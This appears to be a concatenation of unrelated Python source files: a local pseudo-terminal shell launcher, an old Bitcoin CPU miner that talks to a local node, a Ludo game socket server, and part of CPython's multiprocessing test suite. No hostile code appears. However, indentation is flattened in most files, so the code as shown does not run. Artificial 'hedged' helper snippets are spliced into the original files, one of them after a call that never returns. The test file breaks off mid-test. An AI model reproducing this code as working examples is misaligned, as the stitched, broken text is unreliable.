c = sys.stdin.buffer.read(1)
tty.write(c)
def main():
orig_tcattr = termios.tcgetattr(sys.stdin)
new_tcattr = copy.deepcopy(orig_tcattr)
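    # Note: the saved terminal attributes are not modified or restored below;
    # the shell runs with whatever settings the surrounding terminal already has.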
with Terminal() as tty:
print('-> TTY name: `{}`'.format(tty.tty_name))
print('-> Spawning a shell')
pid = tty.spawn(['/usr/bin/env', '--unset=PS1', '/usr/bin/bash', '--norc', '--noprofile'])
print('-> Starting io thread')
io_thread = Thread(target=io_func, args=[tty], daemon=True)
io_thread.start()
os.waitpid(pid, 0)
if __name__ == '__main__':
main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 6310
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
server.py
|
import socket
from threading import Thread
SERVER = None
PORT = None
IP_ADDRESS = None
CLIENTS = {}
# Boilerplate Code
def handleClient(player_socket,player_name):
global CLIENTS
# Sending Initial message
    playerType = CLIENTS[player_name]["player_type"]
    # player1 moves first, player2 waits for its turn
    CLIENTS[player_name]['turn'] = (playerType == 'player1')
    player_socket.send(str({'player_type': playerType,
                            'turn': CLIENTS[player_name]['turn'],
                            'player_name': player_name}).encode())
    while True:
        try:
            message = player_socket.recv(2048)
            if not message:
                # an empty read means the client disconnected; stop relaying
                break
            # relay the raw message to every connected client (sender included)
            for cName in CLIENTS:
                cSocket = CLIENTS[cName]["player_socket"]
                cSocket.send(message)
        except OSError:
            # broken socket: give up on this client instead of spinning forever
            break
def acceptConnections():
global CLIENTS
global SERVER
while True:
player_socket, addr = SERVER.accept()
player_name = player_socket.recv(1024).decode().strip()
if(len(CLIENTS.keys()) == 0):
CLIENTS[player_name] = {'player_type' : 'player1'}
else:
CLIENTS[player_name] = {'player_type' : 'player2'}
CLIENTS[player_name]["player_socket"] = player_socket
CLIENTS[player_name]["address"] = addr
CLIENTS[player_name]["player_name"] = player_name
CLIENTS[player_name]["turn"] = False
print(f"Connection established with {player_name} : {addr}")
# ------------ Boilerplate Code Start
thread = Thread(target = handleClient, args=(player_socket,player_name,))
thread.start()
# ------------ Boilerplate Code End
def setup():
print("\n")
print("\t\t\t\t\t\t*** LUDO LADDER ***")
global SERVER
global PORT
global IP_ADDRESS
IP_ADDRESS = '127.0.0.1'
PORT = 6000
SERVER = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
SERVER.bind((IP_ADDRESS, PORT))
SERVER.listen(10)
print("\t\t\t\tSERVER IS WAITING FOR INCOMMING CONNECTIONS...")
print("\n")
acceptConnections()
setup()
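# ---------------------------------------------------------------------------
# Hedged illustration (a hypothetical client, not part of the original
# server.py): the server above reads the player name as its first message,
# answers with str(dict) describing player_type/turn, and afterwards simply
# relays every message to all connected sockets. A separate client script
# written against those assumptions could look like this sketch (shown here
# for reference only; in practice it would live in its own file):
import ast
def join_ludo_server(player_name, host='127.0.0.1', port=6000):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((host, port))
    client.send(player_name.encode())                   # the name goes first
    greeting = ast.literal_eval(client.recv(2048).decode())  # parse str(dict)
    print(f"Joined as {greeting['player_type']}, my turn: {greeting['turn']}")
    return client
# Usage (with the server above running): client = join_ludo_server('alice')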
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 60.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
    # Since multiprocessing.Process has the same API as threading.Thread
    # (join() and is_alive()), the support function can be reused
support.join_thread(process, timeout=TIMEOUT)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
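# Hedged note (illustration, not part of the original test module): the
# PRELOAD list above is intended for multiprocessing.set_forkserver_preload(),
# which has the forkserver parent import those modules once so forked workers
# inherit them instead of re-importing. A minimal sketch of applying it:
def _demo_apply_forkserver_preload(modules=tuple(PRELOAD)):
    if 'forkserver' in multiprocessing.get_all_start_methods():
        multiprocessing.set_forkserver_preload(list(modules))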
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
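# Hedged usage note (illustration, not part of the original test module):
# TimingWrapper is how these tests assert how long a blocking call actually
# blocked -- wrap the callable, invoke it, then inspect .elapsed. For example:
def _demo_timing_wrapper():
    wrapped_sleep = TimingWrapper(time.sleep)
    wrapped_sleep(0.05)               # forwards arguments and return value
    return wrapped_sleep.elapsed      # roughly 0.05 seconds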
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=60):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=60):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=5)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
            # this check only makes sense for the forkserver start method
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
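# Hedged usage note (illustration, not part of the original test module):
# queue_empty()/queue_full() exist because some queue flavours used in these
# tests may not expose empty()/full(); the helpers fall back to qsize() in
# that case. With a plain multiprocessing.Queue:
def _demo_queue_helpers():
    q = multiprocessing.Queue(maxsize=1)
    assert queue_empty(q)
    q.put('x')
    time.sleep(DELTA)   # item may still sit in the feeder buffer (see test_put)
    assert queue_full(q, 1)
    q.get()
    close_queue(q)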
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
